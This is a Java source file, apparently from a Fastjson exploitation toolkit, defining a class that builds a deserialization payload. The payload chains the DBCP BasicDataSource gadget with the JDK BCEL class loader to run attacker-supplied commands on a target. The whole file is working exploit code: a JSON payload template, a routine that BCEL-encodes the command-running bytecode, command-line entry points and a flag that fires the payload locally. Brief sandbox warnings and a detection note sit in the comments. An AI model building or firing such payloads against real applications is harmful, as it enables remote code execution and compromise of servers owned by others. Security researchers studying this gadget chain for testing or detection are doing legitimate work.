package payloads;

import com.alibaba.fastjson.JSON;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import gadget.Gadget;
import payloads.annotation.Dependencies;
import payloads.annotation.PayloadType;
import payloads.annotation.VulVersion;
import util.JarFileReader;

/*
 * Only works in a Tomcat environment.
 * tomcat-dbcp:9.0.8 did not work in testing.
 * Also depends on commons-dbcp.
 * */

// The dbcp version in pom.xml must be switched to 9.x.
// Based on org.apache.tomcat.dbcp.dbcp2.BasicDataSource.
// The "dbcp" package without the "2" is the older layout, e.g. Tomcat 7.0.0:
// org.apache.tomcat.dbcp.dbcp.BasicDataSource
// The class the inline payload ultimately targets is
// org.apache.commons.dbcp.BasicDataSource

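/**
 * Builds a Fastjson payload around the DBCP {@code BasicDataSource} gadget.
 *
 * <p>The generated JSON sets {@code driverClassLoader} to the JDK-internal
 * {@code com.sun.org.apache.bcel.internal.util.ClassLoader} and
 * {@code driverClassName} to a {@code $$BCEL$$}-encoded class produced by
 * {@link Gadget#getBasicDataSource1ExpCode(String)}. This is a LOCAL payload:
 * the bytecode travels inside the JSON itself and no outbound JNDI/RMI/LDAP
 * connection is made, so the single argument is a command/code specification,
 * not a server address.
 *
 * <p>Two entry points share one builder:
 * <ul>
 *   <li>{@link #process(String[])} — framework entry; reads the JSON skeleton
 *       from {@code BasicDataSource2.tpl} and fills {@code ###EVIL_CODE###}.</li>
 *   <li>{@link #main(String[])} — standalone entry; uses the inline template
 *       below, which targets {@code org.apache.commons.dbcp.BasicDataSource}.
 *       Earlier revisions also tried {@code org.apache.tomcat.dbcp.dbcp.BasicDataSource}
 *       (Tomcat 7.x) and {@code org.apache.tomcat.dbcp.dbcp2.BasicDataSource}
 *       (Tomcat 9.x); swap the {@code @type} in {@link #INLINE_TEMPLATE} if the
 *       target ships a different DBCP package.</li>
 * </ul>
 *
 * <p><b>Safety:</b> the optional {@code -exec} flag parses the finished payload
 * with the local Fastjson, which executes the embedded gadget bytecode in
 * <em>this</em> JVM. Use it only to verify a payload in a sandbox you control.
 *
 * <p><b>Detection note:</b> the payload is recognisable by the nested
 * {@code @type} keys naming a {@code BasicDataSource} and the BCEL class loader,
 * and by the {@code $$BCEL$$} prefix in {@code driverClassName}.
 */
@PayloadType({PayloadType.LOCAL})
// NOTE(review): "1.2.2.1-1.2.2.4" may be intended as 1.2.22-1.2.24 — confirm
// against the format @VulVersion expects before relying on it for filtering.
@VulVersion({"1.2.2.1-1.2.2.4"})
@Dependencies({"tomcat-dbcp:tomcat-dbcp:7.x","tomcat-dbcp:tomcat-dbcp:9.x","commons-dbcp:commons-dbcp:1.4"})
public class BasicDataSource2 implements ObjectPayload {

    /** Placeholder in {@code BasicDataSource2.tpl} that receives the encoded class. */
    private static final String TEMPLATE_MARKER = "###EVIL_CODE###";

    /** Placeholder in {@link #INLINE_TEMPLATE} that receives the encoded class. */
    private static final String INLINE_MARKER = "xxxxxxxxxx";

    /** Prefix the BCEL class loader requires to decode a class from its name. */
    private static final String BCEL_PREFIX = "$$BCEL$$";

    /** Trailing CLI flag that requests local parsing of the built payload. */
    private static final String EXEC_FLAG = "-exec";

    /**
     * Inline JSON skeleton used by {@link #main(String[])}. Wrapped in a
     * {@code JSONObject} so the inner object is deserialised as a map key.
     */
    private static final String INLINE_TEMPLATE =
            "{{\"@type\":\"com.alibaba.fastjson.JSONObject\",\"c\":{\"@type\":\"org.apache.commons.dbcp.BasicDataSource\",\"driverClassLoader\":{\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"},\"driverClassName\":\"xxxxxxxxxx\"}}:\"ddd\"}";

    /**
     * Framework entry point.
     *
     * @param args {@code args[0]} is the payload name chosen by the launcher,
     *             {@code args[1]} the command/code spec, optional {@code args[2]}
     *             is {@code -exec} to parse the result locally.
     */
    @Override
    public void process(String[] args) {
        if (args.length != 2 && args.length != 3) {
            System.out.println("[*] Usage: java -jar FastjsonExploit-[version].jar BasicDataSource2 \"[cmd:xxx|code:xxx.java]\" [-exec]");
            return;
        }

        try {
            String command = args[1].trim();
            String template = new JarFileReader().read("BasicDataSource2.tpl");
            String payload = template.replace(TEMPLATE_MARKER, encodeGadget(command));
            System.out.println("[*] payload build success!");
            System.out.println("\n" + payload + "\n");

            if (args.length == 3 && EXEC_FLAG.equals(args[2])) {
                parseLocally(payload);
            }
        } catch (Exception e) {
            // CLI boundary: surface the failure and exit normally.
            e.printStackTrace();
        }
    }

    /**
     * Standalone entry point using {@link #INLINE_TEMPLATE}.
     *
     * @param args {@code args[0]} is the command/code spec, optional
     *             {@code args[1]} is {@code -exec} to parse the result locally.
     */
    public static void main(String[] args) {
        if (args.length != 1 && args.length != 2) {
            // The argument is a command/code spec (see encodeGadget), not an
            // RMI/LDAP address — this gadget carries its bytecode inline.
            System.out.println("[*] Usage: java -cp FastjsonExploit-<version>.jar payloads.BasicDataSource2 \"[cmd:xxx|code:xxx.java]\" [-exec]");
            return;
        }

        String command = args[0].trim();
        System.out.println(command);

        try {
            String payload = INLINE_TEMPLATE.replace(INLINE_MARKER, encodeGadget(command));
            System.out.println(payload);

            if (args.length == 2 && EXEC_FLAG.equals(args[1])) {
                parseLocally(payload);
            }
        } catch (Exception e) {
            // CLI boundary: surface the failure and exit normally.
            e.printStackTrace();
        }
    }

    /**
     * Produces the {@code driverClassName} value: the gadget bytecode for
     * {@code command}, BCEL-encoded (compressed, per the {@code true} flag)
     * and prefixed with {@code $$BCEL$$} so the BCEL class loader decodes
     * and defines it on the fly.
     *
     * @param command command/code spec handed to {@link Gadget}
     * @return the encoded class name to embed in the payload
     * @throws Exception whatever {@link Gadget} or {@link Utility#encode}
     *                   raise; callers handle it at the CLI boundary
     */
    private static String encodeGadget(String command) throws Exception {
        byte[] byteCode = Gadget.getBasicDataSource1ExpCode(command);
        return BCEL_PREFIX + Utility.encode(byteCode, true);
    }

    /**
     * Parses {@code payload} with the local Fastjson.
     *
     * <p>WARNING: this triggers the gadget chain — and therefore the embedded
     * bytecode — inside the current JVM. Intended only for verifying a payload
     * in an isolated sandbox.
     *
     * @param payload fully built JSON payload
     */
    private static void parseLocally(String payload) {
        System.out.println("[*] Try local parsing");
        JSON.parseObject(payload);
    }
}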
